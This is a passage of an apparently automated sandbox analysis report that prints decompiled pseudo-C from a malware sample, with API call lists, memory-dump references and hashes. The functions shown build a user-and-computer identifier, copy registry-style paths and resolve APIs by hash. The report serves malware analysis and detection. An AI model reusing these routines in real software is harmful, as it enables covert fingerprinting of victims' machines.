                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C7584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C75861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C75877
                                            • Part of subcall function 00C77B01: memset.NTDLL ref: 00C77B80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 889a55692c30e6a5fbf810dded571e43fa39016582ea8185c069737b07e18e0f
                                          • Instruction ID: 38ff7093edb52a782fdfd9401c462c00e1435ef1f57a885a394f8a923d4e0bc6
                                          • Opcode Fuzzy Hash: 889a55692c30e6a5fbf810dded571e43fa39016582ea8185c069737b07e18e0f
                                          • Instruction Fuzzy Hash: BF212AB1A0070A9FDB10DF69C844E6AB7ECEF44300B0581A5E90DDB251EA70EE458B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7A642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E00C7A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xc7d33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E00C7A5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00C7621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E00C7147E(_a8);
						goto L29;
					}
					_t65 =  *0xc7d2a4; // 0x24ba5a8
					_t16 = _t65 + 0xc7e8de; // 0x65696c43
					_t68 = E00C7A5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d00c7c0
						if(E00C74C9A( *_t33, _t96, _a8,  *0xc7d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xc7d2a4; // 0x24ba5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0xc7ea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xc7ea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E00C730FC( &_a24, _t73,  *0xc7d334,  *0xc7d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0xc7d2a4; // 0x24ba5a8
									_t44 = _t75 + 0xc7e856; // 0x74666f53
									_t78 = E00C7A5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00c7c0
										E00C71BC1( *_t47, _t96, _a8,  *0xc7d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d00c7c0
										E00C71BC1( *_t49, _t96, _t103,  *0xc7d330, _a16);
										E00C7147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00c7c0
									E00C71BC1( *_t40, _t96, _a8,  *0xc7d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d00c7c0
									E00C71BC1( *_t43, _t96, _a8,  *0xc7d330, _a16);
								}
								if( *_t105 != 0) {
									E00C7147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00c7c0
					if(E00C774B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d00c7c0
							E00C74C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E00C7147E(_t104);
						_t102 = _a16;
					}
					E00C7147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0xc7d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x00c7a642
                                          0x00c7a64b
                                          0x00c7a652
                                          0x00c7a657
                                          0x00c7a6c6
                                          0x00c7a6cc
                                          0x00c7a6d1
                                          0x00c7a6da
                                          0x00c7a6df
                                          0x00c7a6e4
                                          0x00c7a858
                                          0x00c7a85f
                                          0x00c7a85f
                                          0x00c7a864
                                          0x00c7a866
                                          0x00c7a866
                                          0x00c7a86f
                                          0x00c7a86f
                                          0x00c7a6ea
                                          0x00c7a6f6
                                          0x00c7a84e
                                          0x00c7a851
                                          0x00000000
                                          0x00c7a851
                                          0x00c7a6fc
                                          0x00c7a701
                                          0x00c7a70a
                                          0x00c7a70f
                                          0x00c7a714
                                          0x00c7a75e
                                          0x00c7a75e
                                          0x00c7a771
                                          0x00c7a77b
                                          0x00c7a781
                                          0x00c7a788
                                          0x00c7a792
                                          0x00c7a792
                                          0x00c7a78a
                                          0x00c7a78a
                                          0x00c7a78a
                                          0x00c7a78a
                                          0x00c7a7b4
                                          0x00c7a7bc
                                          0x00c7a7ea
                                          0x00c7a7ef
                                          0x00c7a7f8
                                          0x00c7a7fd
                                          0x00c7a801
                                          0x00c7a833
                                          0x00c7a803
                                          0x00c7a810
                                          0x00c7a813
                                          0x00c7a823
                                          0x00c7a826
                                          0x00c7a82c
                                          0x00c7a82c
                                          0x00c7a7be
                                          0x00c7a7cb
                                          0x00c7a7ce
                                          0x00c7a7e0
                                          0x00c7a7e3
                                          0x00c7a7e3
                                          0x00c7a83d
                                          0x00c7a849
                                          0x00c7a83f
                                          0x00c7a842
                                          0x00c7a842
                                          0x00c7a83d
                                          0x00c7a7b4
                                          0x00000000
                                          0x00c7a77b
                                          0x00c7a723
                                          0x00c7a72d
                                          0x00c7a72f
                                          0x00c7a734
                                          0x00c7a738
                                          0x00c7a73a
                                          0x00c7a745
                                          0x00c7a748
                                          0x00c7a748
                                          0x00c7a74e
                                          0x00c7a753
                                          0x00c7a753
                                          0x00c7a759
                                          0x00000000
                                          0x00c7a759
                                          0x00c7a65c
                                          0x00000000
                                          0x00c7a683
                                          0x00c7a68e
                                          0x00c7a6a4
                                          0x00c7a6aa
                                          0x00c7a6b2
                                          0x00000000
                                          0x00c7a6b2

                                          APIs
                                          • StrChrA.SHLWAPI(00C7553C,0000005F,00000000,00000000,00000104), ref: 00C7A675
                                          • memcpy.NTDLL(?,00C7553C,?), ref: 00C7A68E
                                          • lstrcpy.KERNEL32(?), ref: 00C7A6A4
                                            • Part of subcall function 00C7A5E9: lstrlen.KERNEL32(?,00000000,00C7D330,00000001,00C7937A,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?), ref: 00C7A5F2
                                            • Part of subcall function 00C7A5E9: mbstowcs.NTDLL ref: 00C7A619
                                            • Part of subcall function 00C7A5E9: memset.NTDLL ref: 00C7A62B
                                            • Part of subcall function 00C71BC1: lstrlenW.KERNEL32(00C7553C,?,?,00C7A818,3D00C7C0,80000002,00C7553C,00C79642,74666F53,4D4C4B48,00C79642,?,3D00C7C0,80000002,00C7553C,?), ref: 00C71BE1
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 00C7A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 95088a9f1d64677ae3118aca31dde7affe581849f1d517c3a911e7fc1718d900
                                          • Instruction ID: f89e3333f79e94f586e23486195ea00ff416f41f5361caa0cf99c195088a519f
                                          • Opcode Fuzzy Hash: 95088a9f1d64677ae3118aca31dde7affe581849f1d517c3a911e7fc1718d900
                                          • Instruction Fuzzy Hash: 84516B7250020AEFDF11AFA4DD41E9E7BB9EF44300F00C555FA2D96061E731DE55AB12
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C7614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00C758BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00C7147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xc75210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x00c76158
                                          0x00c7615b
                                          0x00c7615e
                                          0x00c76164
                                          0x00c76169
                                          0x00c7616f
                                          0x00c76177
                                          0x00c7617a
                                          0x00c76180
                                          0x00c76185
                                          0x00c76192
                                          0x00c7619f
                                          0x00c761a3
                                          0x00c761a5
                                          0x00c761a9
                                          0x00c761ac
                                          0x00c761bc
                                          0x00c7620f
                                          0x00c76210
                                          0x00c761be
                                          0x00c761c3
                                          0x00c761c4
                                          0x00c761c9
                                          0x00c761cc
                                          0x00c761df
                                          0x00000000
                                          0x00c761e1
                                          0x00c761e4
                                          0x00c761e9
                                          0x00c761f7
                                          0x00c761fa
                                          0x00c76200
                                          0x00c76205
                                          0x00000000
                                          0x00c76207
                                          0x00c76207
                                          0x00c7620a
                                          0x00c7620a
                                          0x00c76205
                                          0x00c761df
                                          0x00c76215
                                          0x00c76216
                                          0x00c76185
                                          0x00c7621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,00C7520E), ref: 00C7615E
                                          • GetComputerNameW.KERNEL32(00000000,00C7520E), ref: 00C7617A
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetUserNameW.ADVAPI32(00000000,00C7520E), ref: 00C761B4
                                          • GetComputerNameW.KERNEL32(00C7520E,?), ref: 00C761D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00C7520E,00000000,00C75210,00000000,00000000,?,?,00C7520E), ref: 00C761FA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: f75df27ffcfde94883cf52bd05216f77291214944e84f7851ab4f3265c827191
                                          • Instruction ID: 054e70f9f40c4050216c1a9fdae9d75900afb723f811a3d28cf3275669c1ba69
                                          • Opcode Fuzzy Hash: f75df27ffcfde94883cf52bd05216f77291214944e84f7851ab4f3265c827191
                                          • Instruction Fuzzy Hash: 2F21F7B6900208FFCB11DFE8C985DEEBBB8EF44344B1484AAE506E7201E6309F44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C762CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00C762CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0xc7d114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0xc7d238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x00c762d5
                                          0x00c762d8
                                          0x00c762da
                                          0x00c762e3
                                          0x00c762f5
                                          0x00c762f5
                                          0x00c762f9
                                          0x00c762fb
                                          0x00c762fe
                                          0x00c76301
                                          0x00c7630a
                                          0x00c76314
                                          0x00c76318
                                          0x00c7631d
                                          0x00c76333
                                          0x00c76337
                                          0x00c76388
                                          0x00c76339
                                          0x00c76339
                                          0x00c76341
                                          0x00c76350
                                          0x00c76355
                                          0x00c76365
                                          0x00c7636b
                                          0x00c76376
                                          0x00c76380
                                          0x00c76384
                                          0x00c76384
                                          0x00c76337
                                          0x00c7638f
                                          0x00c76396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00C76301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C7632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00C76341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00C76350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00C7636B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 39c83d4217d8d569f12b321d411c7f2caba04a8185ddc319b8489a740e8c1522
                                          • Instruction ID: 523794aea427e65323c89de794fb988fe88576205d6b61862074005c087b5c39
                                          • Opcode Fuzzy Hash: 39c83d4217d8d569f12b321d411c7f2caba04a8185ddc319b8489a740e8c1522
                                          • Instruction Fuzzy Hash: 2E217C7690020AAFCB019F69C885BDEBF79EF85304F058058F958AB315C731EA55CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C79FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00C79FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00C76B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00C7A96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0xc7d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x00c79fe7
                                          0x00c79ff4
                                          0x00c79ff6
                                          0x00c7a059
                                          0x00000000
                                          0x00c7a059
                                          0x00c7a00e
                                          0x00c7a015
                                          0x00c7a021
                                          0x00c7a026
                                          0x00c7a028
                                          0x00c7a02a
                                          0x00c7a02c
                                          0x00c7a02e
                                          0x00c7a030
                                          0x00c7a03c
                                          0x00c7a04c
                                          0x00000000
                                          0x00c7a03e
                                          0x00c7a03e
                                          0x00c7a045
                                          0x00c7a052
                                          0x00c7a052
                                          0x00c7a052
                                          0x00c7a045
                                          0x00c7a03c
                                          0x00c7a057
                                          0x00000000
                                          0x00000000
                                          0x00c7a05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00C766AF,?,?,00000000,00000000), ref: 00C7A021
                                          • ResetEvent.KERNEL32(?), ref: 00C7A026
                                          • GetLastError.KERNEL32 ref: 00C7A03E
                                          • GetLastError.KERNEL32(?,?,00000102,00C766AF,?,?,00000000,00000000), ref: 00C7A059
                                            • Part of subcall function 00C76B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?,?,00000000), ref: 00C76B7A
                                            • Part of subcall function 00C76B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?), ref: 00C76BD8
                                            • Part of subcall function 00C76B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 00C76BE8
                                          • SetEvent.KERNEL32(?), ref: 00C7A04C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 2350aa7930769e9891c07f64a2cd7e6f992d3b1f4c9367501a6cd05966cb0f42
                                          • Instruction ID: 52ad23ee07d6e09075dec92a1f6da907ce510211bf6b949be8dd59dc22a903a8
                                          • Opcode Fuzzy Hash: 2350aa7930769e9891c07f64a2cd7e6f992d3b1f4c9367501a6cd05966cb0f42
                                          • Instruction Fuzzy Hash: 92014B31100201ABDB306B71DC44F5FB6A9EF85764F208A28F66AD10E0D721E855EA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C76A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C76A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xc7d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xc7d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xc7d258 = _t6;
					 *0xc7d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xc7d254 = _t7;
					if(_t7 == 0) {
						 *0xc7d254 =  *0xc7d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x00c76a87
                                          0x00c76a8d
                                          0x00c76a94
                                          0x00000000
                                          0x00c76aee
                                          0x00c76a96
                                          0x00c76a9e
                                          0x00c76aab
                                          0x00c76aab
                                          0x00c76aeb
                                          0x00000000
                                          0x00c76aeb
                                          0x00c76aad
                                          0x00c76aad
                                          0x00c76ab2
                                          0x00c76ac4
                                          0x00c76ac9
                                          0x00c76acf
                                          0x00c76ad5
                                          0x00c76adc
                                          0x00c76ade
                                          0x00c76ade
                                          0x00000000
                                          0x00c76ae5
                                          0x00c76aa7
                                          0x00000000
                                          0x00000000
                                          0x00c76aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00C790D2,?), ref: 00C76A87
                                          • GetVersion.KERNEL32 ref: 00C76A96
                                          • GetCurrentProcessId.KERNEL32 ref: 00C76AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00C76ACF
                                          • GetLastError.KERNEL32 ref: 00C76AEE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: ed9d57f41e7155180745658c9350605befdadb1804d3270a41044b01c438dbda
                                          • Instruction ID: c86995bc508543e65f4eb8787ccb9d460d3dd2c5a3a2cb282b4c3ed7894714c5
                                          • Opcode Fuzzy Hash: ed9d57f41e7155180745658c9350605befdadb1804d3270a41044b01c438dbda
                                          • Instruction Fuzzy Hash: E9F08C70650702DBDB209F65AC4AB1D3B70AB44721F20C01AE55FE61E1D770C986DB25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C791B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E00C791B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xc7d2a4; // 0x24ba5a8
					_t5 = _t103 + 0xc7e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xc7c298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xc7d2a4; // 0x24ba5a8
												_t28 = _t109 + 0xc7e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xc7d2a4; // 0x24ba5a8
														_t33 = _t79 + 0xc7e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x00c791ba
                                          0x00c791c3
                                          0x00c791c4
                                          0x00c791c8
                                          0x00c791ce
                                          0x00c791d4
                                          0x00c791dd
                                          0x00c791e3
                                          0x00c791ed
                                          0x00c791ef
                                          0x00c791f5
                                          0x00c791fa
                                          0x00c79205
                                          0x00c7920b
                                          0x00c79210
                                          0x00c79332
                                          0x00c79216
                                          0x00c79216
                                          0x00c79223
                                          0x00c79229
                                          0x00c7922f
                                          0x00c79233
                                          0x00c79239
                                          0x00c79246
                                          0x00c7924a
                                          0x00c79250
                                          0x00c79253
                                          0x00c7925b
                                          0x00c7925c
                                          0x00c79260
                                          0x00c79264
                                          0x00c79267
                                          0x00c7926a
                                          0x00c79270
                                          0x00c79279
                                          0x00c7927f
                                          0x00c79280
                                          0x00c79283
                                          0x00c79284
                                          0x00c79285
                                          0x00c7928d
                                          0x00c7928e
                                          0x00c7928f
                                          0x00c79291
                                          0x00c79295
                                          0x00c79299
                                          0x00000000
                                          0x00000000
                                          0x00c7929f
                                          0x00c792a8
                                          0x00c792ae
                                          0x00c792b8
                                          0x00c792bc
                                          0x00c792be
